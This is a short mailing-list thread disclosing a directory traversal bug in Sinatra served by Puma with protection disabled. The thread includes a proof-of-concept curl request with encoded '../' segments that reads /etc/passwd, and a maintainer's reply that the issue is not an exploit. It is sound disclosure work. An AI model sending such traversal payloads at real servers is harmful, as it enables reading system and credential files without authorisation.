Puma + Sinatra + protection disabled + static files = arbitrary file access via directory traversal

[Mathew Rowley]

When Sinatra is run via Puma, is configured with `protection` disabled, and hosts static files, a directory traversal bug exists.

POC:

gem install puma sinatra # use puma because webrick throws a Bad URI error

ruby -r sinatra -e "set protection: false, public_folder: Dir.pwd, static: true"

curl http://localhost:4567/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

It looks like this is known[0][1] and the PR comment explains that it does not introduce a directory traversal bug, however it actually does. It would be fair to say that the `rack-protection` middleware mitigates this from being exploited, but if there is a code path to this method that includes a directory traversal payload, it can be exploited. Yes, it is true that the default configuration (protection enable) does prevent this from happening, however even with protection disabled, should it be possible to access an arbitrary file via directory traversal? 

Mathew Rowley

[0] https://github.com/sinatra/sinatra/pull/779

[1] (Note: lighthouse link dead) https://groups.google.com/forum/#!searchin/sinatrarb/traversal%7Csort:relevance/sinatrarb/6Vp3JQd-vzM/LjGsFVspjScJ 

[Zachary Scott]

If disabling the protection that prevents certain attacks makes you
vulnerable to said attacks, it's not a security exploit -- please use
the rack-protection gem.

> --
> You received this message because you are subscribed to the Google Groups
> "sinatrarb" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to sinatrarb+...@googlegroups.com.
> For more options, visit https://groups.google.com/d/optout.